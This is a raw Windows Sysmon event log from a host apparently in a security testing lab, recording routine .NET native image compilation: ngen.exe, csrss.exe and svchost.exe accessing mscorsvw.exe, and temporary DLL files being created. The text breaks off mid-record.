13:51:08.335{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.335{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5604-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.304{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5504-00000000A301}4596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.288{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5504-00000000A301}4596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:08.288{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5504-00000000A301}4596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:08.210{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cb8-0\System.Printing.dll2021-01-18 13:51:08.210 10341000x80000000000000008646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.960{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5F04-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.945{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5F04-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.945{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5F04-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:09.882{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1338-0\System.Security.dll2021-01-18 13:51:09.882 10341000x80000000000000008642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.507{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.507{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5E04-00000000A301}4920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.460{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5D04-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.460{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5D04-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.460{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5D04-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:09.398{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\630-0\System.Runtime.Serialization.Formatters.Soap.dll2021-01-18 13:51:09.398 10341000x80000000000000008635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.241{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.226{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.226{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5C04-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5B04-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.179{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5B04-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:09.179{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5B04-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:09.116{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e30-0\System.Runtime.DurableInstancing.dll2021-01-18 13:51:09.116 10341000x80000000000000008656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:10.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.945{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:10.945{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\